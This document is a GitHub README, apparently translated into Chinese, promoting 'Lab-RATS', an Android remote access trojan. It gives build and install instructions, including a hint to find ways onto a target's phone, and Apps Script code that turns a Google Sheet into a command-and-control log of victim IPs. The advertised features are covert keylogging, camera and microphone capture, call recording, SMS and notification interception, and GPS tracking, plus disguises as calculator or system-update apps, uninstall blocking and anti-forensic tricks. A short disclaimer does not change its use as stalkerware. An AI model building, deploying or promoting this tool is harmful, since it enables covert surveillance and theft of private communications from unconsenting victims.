K4N3CO-LABS/Lab-RATS

GitHub: K4N3CO-LABS/Lab-RATS

一款面向安全研究与渗透测试的 Android 远程管理工具,通过隐蔽的 Web C2 面板提供屏幕镜像、键盘记录、摄像头监控、消息拦截等全套远程控制能力。

Stars: 9 | Forks: 5

[![Screenshot-2026-07-03-at-2-55-28-AM.png](https://i.postimg.cc/2S1JKdt7/Screenshot-2026-07-03-at-2-55-28-AM.png)](https://postimg.cc/xXStkmnX) # 🐀 Lab-RATS: 高级 Android 远程管理工具 (v1.3.2) **Lab-RATS** 是一款由 **K4N3CO.LABS** 开发的**强大**且**轻量级的 Android 远程管理工具 (RAT)**。该工具允许通过一个专为速度和可靠性设计的**时尚 Web 界面**对 Android 设备进行**远程监控和管理**。为现代而生,它完全支持最新的 **2026 Android 软件版本** *(OneUI 8.5, SDK 36)*。 ## 🛡️ 核心功能与安全性 - 📦 **自动生成 APK**:即时构建 `signed.apk` *(用于生产环境)* 和 `unsigned.apk`。 - 🆔 **高级身份控制**:完全自定义**应用名称**、**包名 (Package ID)** 和**最低 SDK**。 - 🔐 **C2 安全层**:Web 面板受安全登录墙保护(**默认密码:admin1337**)。可以直接从终端主页更新密码以增强安全性。 - 🎨 **智能品牌引擎**: - **自动密度缩放**:自动为所有 Android 屏幕密度调整徽标大小。 - **透明度修复器**:自动移除徽标素材的白色背景。 - 📱 **PC/移动端响应式**:远程 Web 界面针对 PC 和智能手机浏览器进行了全面优化,具有对触摸友好的布局、自适应导航标签和可缩放的 UI 元素,适合从任何设备进行监控。*(所有远程功能在两种界面上均可使用)* ## 🕵️ 隐蔽与隐形操作 - 🎭 **隐形模式**:通过包含极具欺骗性克隆应用的“伪装库”,远程替换整个应用身份和图标。瞬间将 Lab-RATS 转换为**计算器**、**天气应用**、**系统更新**或**设置**菜单。 - 🛠️ **功能性诱饵引擎**:与静态图像不同,这些诱饵是**完全交互式**的。计算器可以执行真实的数学计算,天气应用会动态加载目标的实际城市名称和天气预报,从而绕过最严格的细致检查。 - 🩹 **自我修复协议**:在后台自动检测并修复受损的服务绑定或被撤销的权限,确保 C2 链路持久在线,无需用户干预。 - ☎️ **拨号盘恢复**:如果启动器图标被隐藏或替换,**在手机键盘上拨打 `*#1337#`** 可立即终止所有伪装并恢复原始的 Lab-RATS 面板。 - 🚪 **隐藏后门**:每个诱饵都带有一个秘密绕过方式。**快速点击屏幕或背景图标 10 次**即可立即解锁 C2 服务器界面。*(当应用关闭时会自动重新开启隐形模式。)* - 👻 **任务列表隐藏**:该应用经过硬编码,在 **Android "最近的应用" 列表中不可见**,确保在多任务处理期间不留痕迹。 - 📡 **深度品牌重塑**:在隐形模式激活时,所有后台服务通知都会自动更改为匹配的图标和名称,以确保系统托盘中不会出现任何品牌泄露。 - 🎲 **动态 OTA 伪装**:生成模仿合法系统 OTA 更新的随机版本名称和代码,以混淆取证分析。 - 🌑 **黑屏模式 (WIP)**:一种高隐蔽性原型,旨在物理掩盖设备显示屏,同时保持实时的远程监控。*(目前正在开发测试中。)* ## 🚀 有趣的功能(远程控制能力) - 👻 **幽灵控制器(黄金标准)**: - **实时键盘记录**:从任何应用中**实时拦截按键和系统文本**。 - **📱 隐蔽屏幕镜像与交互**:**镜像实时屏幕并与设备远程交互**,基本上让您**无需任何"同意提示"即可完全控制设备**。 - **💀 防卸载保护**:自动阻止**卸载或强制停止**该应用的企图。 - 🛰️ **精准 GPS 跟踪**:一键链路即可在 Google Maps 中打开目标的**精确实时位置**。 - ⚡ **情报流(通知嗅探器)**:拦截到达设备的所有通知(*WhatsApp、Telegram、RCS、系统通知*),并在**实时**时间线信息流中查看它们。 - 🖼️ **MMS 终端(改变游戏规则!)**: - **浏览与提取**:下载并查看设备上存储的**任何彩信 (MMS)**,包括**图像和视频**。 - **远程调度**:直接从目标手机发送**MMS/图片消息**,内置**文件浏览器**可方便您从 PC 上挑选媒体文件。 - 💬 **SMS 指挥中心**: - **全面拦截**:浏览并复制每一条发送/接收的短信。 - **远程发信**:使用目标的号码向全球任何目的地发送 SMS。 - 📸 **光学与监控**: - **实时摄像头流**:从**前置和后置摄像头**查看高速视频流。 - **🌙 夜视模式**:传感器增强的低光模式,在近乎全黑的环境下也能看清。 - **硬件稳定性引擎**:统一的摄像头管理**可防止资源冲突**,确保即使在安全性极高的 Android 15/16 设备上也能可靠地进行后台捕捉和流媒体传输。 - **后台录制**:在没有任何面向用户的活动下,隐蔽地录制高质量视频。 - **即时拍摄**:远程拍摄高分辨率照片。 - 🎙️ **声学与拦截**: - **环境监听**:实时麦克风录音,提供高保真的音频监控。 - **通话录音**:自动录制所有来电和去电。 - 📂 **高级数据上传**: - **集成文件管理器**:浏览、下载和管理内部和外部存储中的文件。 - **📝 直接文件编辑器**:直接从浏览器对设备上的文本、JSON 和日志文件进行实时编辑。 - 📊 **遥测与报告**: - **全面系统提取**:详细的硬件、网络和电池分析数据。 - **通讯录与通话记录**:即时提取目标设备的完整通讯录和通信历史记录。 - **C2 自动报告**:将设备 IP 和状态隐蔽地报告到集中的 **Google 表格**中。 ## 📸 截图

--- > APK Builder Interface & Built Android App (C2 Server) on Target Device < ---
APK-builder-pic Android-App-Screen

--- > Covert App Icon Changed & Fake Update Overlay Using Masquerade Mode < ---
SYS-Update-icon Fake-update

--- > Remote Web Control Panel (Mobile Interface) < ---
Mobile-interface-Home Mobile-cam-menu Mobile-cam-menu1 Mobile-interface-GPS Mobile-interface-SMS

--- > Remote Web Control Panel (PC Interface) < ---
1-Terminal-Tab 2-Ghost-Tab 3-Optics-Tab 4-GPS-Tab 5-Data-Tab 6-Intel-Tab 7-SMS-Tab 8-MMS-Tab 9-Acoustics-Tab 10-Call-Logs-Tab 11-Contacts-Tab 12-Hardware-Tab ## 🧠 直接 IPv6 访问(“后门”协议) 在安全研究期间,发现现代 Android 网络中存在一个**关键行为**:连接到**移动数据**(和现代 WiFi)的设备会被分配**公共 IPv6 地址**。 与受到 **NAT 严重限制**且需要复杂端口转发的 IPv4 不同,**IPv6 地址在公共互联网上是可直接路由的**。 ### Lab-RATS 是如何利用这一点的: 1. **分布式服务器**:该应用在 Android 设备**(端口 8080)**上初始化一个**轻量级 HTTP 服务器**。 2. **零配置**:因为设备使用公共 IPv6,您可以**直接从世界任何地方**访问终端,无需设置路由器、防火墙或隧道 (*Ngrok/Pinggy*)。 3. **动态 IP 解决方案**:移动网络会频繁轮换 IP。Lab-RATS 通过使用 **Google 表格作为“命令与控制 (C2) 电话簿”**解决了这个问题。 4. **隐蔽链路**:该应用会**静默检测**其当前的 IPv6,并将活动链接发布到您的表格中。您只需打开表格并点击最新链接即可重新获得控制权。 ## 🛠️ 开始使用 ### 1. 前置条件 * 您的工作站上安装了 **Java 11 或 21**。 * 一台目标 **Android** 设备。 * 一个用于 IP 跟踪的 **Google 表格 Webhook URL**。 ### 2. 构建 APK(在 PC 上) 1. **下载并解压**代码库 zip 文件。 2. 导航至 `cd /Lab-RATS-main/app-builder/`。 3. 执行构建程序: * **Windows**: `build.bat` * **Linux/Mac**: `chmod +x build.sh && ./build.sh` 4. 选择 **Option 1** 并提供您的配置: * **应用名称**:*(默认:LAB-RATS)* * **Google 表格 URL**:输入您的 **Apps Script URL** *(设置说明如下)* 5. 从 `/Lab-RATS-main/app-builder/output/` 目录中获取您的 `signed.apk`。 ### 3. 在目标/测试设备上安装应用 1. 将 `signed.apk` 安装到**目标/测试 Android 手机或平板电脑**上 *(如果您有权限访问该设备,请在开发者选项中打开 USB 调试,插上 PC 并使用 `adb install signed.apk`,否则请发挥创意寻找安装 `.apk` 的“方法”)*。 2. 一旦在**目标/测试设备**上安装完毕,**授予**应用请求的**所有权限**,然后点击**“初始化服务器 (Initialize Server)”**按钮。 3. **活动的 Web 界面 IP 链接**应该会立即**弹出**在您的 **Google 表格**中。*(示例表格见下文)* 4. **就是这样**!只要应用服务器**在目标/测试设备上运行**,您现在就可以**从世界任何地方使用所有的远程功能**。 ## 📊 Google 表格 C2 设置说明 1. 创建一个新的 **Google 表格**。 2. 转到 **扩展程序 (Extensions)** → **Apps Script**。 3. 使用以下**代码片段** **替换默认代码**: ``` // Lab-RATS C2 Tracking Script function doPost(e) { try { var sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet(); var data = JSON.parse(e.postData.contents); sheet.appendRow([new Date(), data.device, data.network, data.ip, data.port, data.link]); return ContentService.createTextOutput("UPLINK_SUCCESS").setMimeType(ContentService.MimeType.TEXT); } catch (err) { return ContentService.createTextOutput("UPLINK_ERROR").setMimeType(ContentService.MimeType.TEXT); } } // Run once to initialize headers function setupSheet() { var sheet = SpreadsheetApp.getActiveSpreadsheet().getActiveSheet(); sheet.appendRow(["Timestamp", "Device", "Network", "IP Address", "Port", "Control Link"]); sheet.getRange("A1:F1").setFontWeight("bold").setBackground("#050505").setFontColor("#00f2ff"); } ``` 4. **部署 (Deploy)** → **Web 应用 (Web App)** → **执行身份为我自己 (Execute as Me)** → **访问权限设为任何人 (Access Anyone)**。 5. 在出现提示时,将**生成的 URL** 粘贴到 **APK 构建器**中。

--- > Example Google Sheet - Running & Properly Configured < ---
Lab-RATS-Googlesheet

## ⚠️ 免责声明 本工具仅供**教育和授权的安全测试目的**使用。对于因本软件造成的任何**滥用**,**开发者概不负责**。**请负责任地使用它**。**祝您使用愉快** © 2026 **K4N3CO.LABS**
标签:Android, C2框架, DSL, JS文件枚举, VX技术, 域名枚举, 安全学习资源, 目录枚举, 移动安全, 足迹探测, 远控木马